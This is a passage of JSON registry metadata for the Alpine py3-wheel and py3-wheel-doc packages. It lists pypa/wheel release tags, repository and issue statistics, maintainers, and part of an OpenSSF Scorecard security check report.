com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:25.916Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":12.687646501421376,"forks_count":9.640416936811132,"docker_downloads_count":null,"average":5.582015859558127},"purl":"pkg:apk/alpine/py3-wheel-doc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.18","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-doc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-doc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-doc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-doc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-doc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-doc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-doc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-doc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-doc/codemeta","maintainers":[{"uuid":"alice@ayaya.dev","login":null,"name":"psykose","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","packages_count":493,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","role":null,"created_at":"2023-05-22T20:58:28.927Z","updated_at":"2023-05-22T20:58:28.927Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers/alice@ayaya.dev/packages"}],"registry":{"name":"alpine-v3.18","url":"https://pkgs.alpinelinux.org/packages?branch=v3.18","ecosystem":"alpine","default":false,"packages_count":20068,"maintainers_count":367,"namespaces_count":2,"keywords_count":3640,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1185},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-05-22T10:43:30.622Z","updated_at":"2026-06-10T05:19:44.026Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/namespaces"}},{"id":7767317,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2023-04-18T16:39:19.000Z","latest_release_published_at":"2023-04-18T16:39:19.000Z","latest_release_number":"0.40.0-r1","last_synced_at":"2026-04-09T03:02:41.775Z","created_at":"2023-05-22T11:24:32.895Z","updated_at":"2026-04-09T03:02:41.775Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.18/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update 